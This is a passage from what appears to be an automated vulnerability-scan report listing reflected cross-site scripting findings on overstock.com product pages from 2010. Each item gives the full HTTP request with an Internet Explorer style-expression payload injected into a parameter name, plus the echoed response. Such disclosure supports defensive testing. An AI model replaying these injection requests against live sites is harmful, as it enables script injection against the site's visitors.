Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:50:19 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=1720379|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:50:19 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407819167:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=32
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 116034

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j19.overstock.com ssl:false -->


<head>

<title>An
...[SNIP]...
<input type="hidden" name="f0b76"style="x:expression(alert(1))"ef556a36a9f" value="1"/>
...[SNIP]...

2.146. http://www.overstock.com/Home-Garden/Ashton-Cube-Ottoman/3915075/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Ashton-Cube-Ottoman/3915075/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35b61"style%3d"x%3aexpression(alert(1))"d61e9bb0077 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 35b61"style="x:expression(alert(1))"d61e9bb0077 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Ashton-Cube-Ottoman/3915075/product.html?35b61"style%3d"x%3aexpression(alert(1))"d61e9bb0077=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:54:45 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:54:45 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:54:45 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3915075|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:54:45 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408085313:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=3
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 112585

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j14.overstock.com ssl:false -->


<head>

<title>As
...[SNIP]...
<input type="hidden" name="35b61"style="x:expression(alert(1))"d61e9bb0077" value="1"/>
...[SNIP]...

2.147. http://www.overstock.com/Home-Garden/Augusta-Chocolate-8-piece-Bed-in-a-Bag/4600850/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Augusta-Chocolate-8-piece-Bed-in-a-Bag/4600850/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c3eb"style%3d"x%3aexpression(alert(1))"c04395c6a01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2c3eb"style="x:expression(alert(1))"c04395c6a01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Augusta-Chocolate-8-piece-Bed-in-a-Bag/4600850/product.html?2c3eb"style%3d"x%3aexpression(alert(1))"c04395c6a01=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:43:38 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:43:38 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289407418846:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:43:38 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4600850|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:43:38 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=18
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 112678

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>Au
...[SNIP]...
<input type="hidden" name="2c3eb"style="x:expression(alert(1))"c04395c6a01" value="1"/>
...[SNIP]...

2.148. http://www.overstock.com/Home-Garden/Authentic-Hotel-Spa-Turkish-Cotton-Unisex-Bathrobe/4757191/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Authentic-Hotel-Spa-Turkish-Cotton-Unisex-Bathrobe/4757191/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed627"style%3d"x%3aexpression(alert(1))"51cc8369783 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ed627"style="x:expression(alert(1))"51cc8369783 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Authentic-Hotel-Spa-Turkish-Cotton-Unisex-Bathrobe/4757191/product.html?ed627"style%3d"x%3aexpression(alert(1))"51cc8369783=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:53:15 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:53:15 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407995447:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4757191|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:53:15 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:53:15 GMT; Path=/
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 112926

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Au
...[SNIP]...
<input type="hidden" name="ed627"style="x:expression(alert(1))"51cc8369783" value="1"/>
...[SNIP]...

2.149. http://www.overstock.com/Home-Garden/Bakers-Rack-with-Wine-Storage/3684083/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Bakers-Rack-with-Wine-Storage/3684083/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fd5f"style%3d"x%3aexpression(alert(1))"2eaac86dec7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2fd5f"style="x:expression(alert(1))"2eaac86dec7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Bakers-Rack-with-Wine-Storage/3684083/product.html?2fd5f"style%3d"x%3aexpression(alert(1))"2eaac86dec7=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:32:02 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:32:02 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406722933:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3684083|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:32:02 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:32:02 GMT; Path=/
Keep-Alive: timeout=5, max=71
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110399

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>Ba
...[SNIP]...
<input type="hidden" name="2fd5f"style="x:expression(alert(1))"2eaac86dec7" value="1"/>
...[SNIP]...

2.150. http://www.overstock.com/Home-Garden/Beautyrest-Cotton-Top-Mattress-Pad/3693416/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Beautyrest-Cotton-Top-Mattress-Pad/3693416/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4631e"style%3d"x%3aexpression(alert(1))"dddbfbee5a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4631e"style="x:expression(alert(1))"dddbfbee5a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Beautyrest-Cotton-Top-Mattress-Pad/3693416/product.html?4631e"style%3d"x%3aexpression(alert(1))"dddbfbee5a3=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:54:41 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:54:42 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408081963:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3693416|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:54:42 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:54:42 GMT; Path=/
Keep-Alive: timeout=5, max=72
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 109850

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>Be
...[SNIP]...
<input type="hidden" name="4631e"style="x:expression(alert(1))"dddbfbee5a3" value="1"/>
...[SNIP]...

2.151. http://www.overstock.com/Home-Garden/Beautyrest-Micromink-Electric-Throw-Blanket/5258414/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Beautyrest-Micromink-Electric-Throw-Blanket/5258414/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7960"style%3d"x%3aexpression(alert(1))"39eb48c4354 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d7960"style="x:expression(alert(1))"39eb48c4354 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Beautyrest-Micromink-Electric-Throw-Blanket/5258414/product.html?d7960"style%3d"x%3aexpression(alert(1))"39eb48c4354=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:51:05 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:51:05 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:51:05 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5258414|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:51:05 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407865443:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=4
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 106235

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j14.overstock.com ssl:false -->


<head>

<title>Be
...[SNIP]...
<input type="hidden" name="d7960"style="x:expression(alert(1))"39eb48c4354" value="1"/>
...[SNIP]...

2.152. http://www.overstock.com/Home-Garden/Becca-Linen-Dining-Chair/4039200/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Becca-Linen-Dining-Chair/4039200/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d89d9"style%3d"x%3aexpression(alert(1))"5ef72601f3e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d89d9"style="x:expression(alert(1))"5ef72601f3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Becca-Linen-Dining-Chair/4039200/product.html?d89d9"style%3d"x%3aexpression(alert(1))"5ef72601f3e=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:24:12 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:24:12 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4039200|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:24:12 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406252460:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:24:12 GMT; Path=/
Keep-Alive: timeout=5, max=36
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 112329

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j17.overstock.com ssl:false -->


<head>

<title>Be
...[SNIP]...
<input type="hidden" name="d89d9"style="x:expression(alert(1))"5ef72601f3e" value="1"/>
...[SNIP]...

2.153. http://www.overstock.com/Home-Garden/Bella-Chaise-Berry/4068267/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Bella-Chaise-Berry/4068267/product.html

Issue detail

